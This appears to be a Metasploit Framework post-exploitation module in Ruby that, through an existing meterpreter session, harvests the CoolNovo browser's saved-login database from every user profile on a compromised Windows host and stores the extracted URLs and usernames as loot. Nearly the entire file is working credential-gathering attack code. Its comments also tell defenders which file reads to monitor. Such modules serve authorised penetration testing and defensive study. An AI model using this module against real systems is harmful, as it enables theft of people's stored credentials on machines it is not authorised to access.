GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/coolnovo.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
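# Post module that collects the CoolNovo browser's saved-login database from
# every user profile on a Windows host, over an existing meterpreter session.
#
# The module contains no collection logic of its own: it declares which file
# to look for (ARTIFACTS) and hands each user profile to the Packrat mixin.
#
# For defenders: the file of interest is `Login Data` under the `MapleStudio`
# directory of each profile's LocalAppData. Reads of that file by a process
# other than the browser are the observable to monitor.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Artifact description passed unchanged to run_packrat. How each key is
  # interpreted is decided by the Packrat mixin, which is not part of this file.
  #
  # The artifact is listed once. A second, byte-identical entry adds nothing
  # to the ARTIFACTS option (its values are de-duplicated) and would presumably
  # make the mixin process the same file twice.
  ARTIFACTS =
    {
      application: 'coolnovo',
      app_category: 'browsers',
      gatherable_artifacts: [
        {
          filetypes: 'logins',
          path: 'LocalAppData',
          dir: 'MapleStudio',
          artifact_file_name: 'Login Data',
          # NOTE(review): this description is broader than the query below,
          # which lists only the action_url and username_value columns.
          description: 'CoolNovo saved Username and Passwords',
          credential_type: 'sqlite',
          sql_search: [
            {
              sql_description: "Database Commands which exports Coolnovo's Login data",
              sql_table: 'logins',
              sql_column: 'action_url, username_value'
            }
          ]
        }
      ]
    }.freeze

  # Registers the module metadata and its datastore options.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Coolnovo Credential Gatherer',
        'Description' => %q{
          This module searches for Coolnovo credentials on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # Build the ARTIFACTS choices from the filetypes declared above, with
    # 'All' placed first so that it is also the default.
    artifact_choices = ARTIFACTS[:gatherable_artifacts].map { |artifact| artifact[:filetypes] }.uniq.unshift('All')

    register_options(
      [
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', artifact_choices])
      ]
    )
  end

  # Prints the active option values, then runs the Packrat sweep once for each
  # user profile returned by grab_user_profiles.
  def run
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # One pass per user profile found on the remote host.
    grab_user_profiles.each do |userprofile|
      run_packrat(userprofile, ARTIFACTS)
    end

    print_status('PackRat credential sweep completed')
  end
end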